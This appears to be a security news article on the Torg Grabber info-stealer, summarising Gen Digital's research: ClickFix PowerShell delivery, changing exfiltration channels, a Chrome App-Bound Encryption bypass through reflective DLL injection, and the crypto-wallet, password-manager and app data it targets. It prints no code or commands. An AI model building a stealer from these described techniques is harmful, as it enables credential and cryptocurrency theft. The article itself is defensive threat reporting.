A new info-stealing malware called Torg Grabber is stealing sensitive data from 850 browser extensions, more than 700 of them for cryptocurrency wallets.

Initial access is obtained through the ClickFix technique by hijacking the clipboard and tricking the user into executing a malicious PowerShell command.

According to researchers at cybersecurity company Gen Digital, Torg Grabber is actively developed, with 334 unique samples compiled in three months (between December 2025 and February 2026) and new command-and-control (C2) servers registered every week.

Apart from cryptocurrency wallets, Torg Grabber steals data from 103 password managers and two-factor authentication tools, and 19 note-taking apps.

Rapid evolution

In a technical report this week, Gen Digital researchers say that Torg Grabber's initial builds used a Telegram-based and then a custom, encrypted TCP protocol for data exfiltration.

On December 18, 2025, the two mechanisms were abandoned in favor of an HTTPS connection routed through Cloudflare infrastructure. The method supports chunked data uploads and payload delivery.

The malware features several anti-analysis mechanisms, multi-layered obfuscation, and uses direct syscalls and reflective loading for evasion, running the final payload entirely in memory.

On December 22, 2025, Torg Grabber added App-Bound Encryption (ABE) bypass to beat Chrome’s (and Brave's, Edge's, Vivaldi's, and Opera's) cookie protection system, like many other information stealers.

However, the researchers also discovered a standalone tool called Underground, used for extracting browser data.

It injects a DLL reflectively into the browser to access Chrome’s COM Elevation Service and extract the master encryption key, a method also recently seen in VoidStealer.

Extensive data theft capabilities

Gen Digital found that Torg Grabber targets 25 Chromium-based browsers and 8 Firefox variants, trying to steal credentials, cookies, and autofill data.

Of the 850 browser extensions it targets, 728 are for cryptocurrency wallets, covering "essentially every crypto wallet ever conceived by human optimism."

"The marquee names are all there - MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, Solflare," the researchers say.

"But the list doesn’t stop at the big names. It keeps going, deep into the long tail, past projects with install counts you could fit in a phone booth."

Apart from wallets, the malware also targets a large list of 103 extensions for passwords, tokens, and authenticators: LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass, Psono, Pleasant Password Server, heylogin, 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA.

Torg Grabber also targets information from Discord, Telegram, Steam, VPN apps, FTP apps, email clients, password managers, and desktop cryptocurrency wallet apps.

The malware can also profile the host, create a hardware fingerprint, document installed software (including 24 antivirus tools), take screenshots of the user’s desktop, and steal files from the Desktop/Documents folders.

Also notable is its capability to execute shellcode on the compromised device, delivered in ChaCha-encrypted zlib-compressed form from the C2.

Gen Digital cautions that Torg Grabber continues to develop rapidly, registering new C2 domains weekly, and that its operator base is expanding, with 40 tags documented by the time of analysis.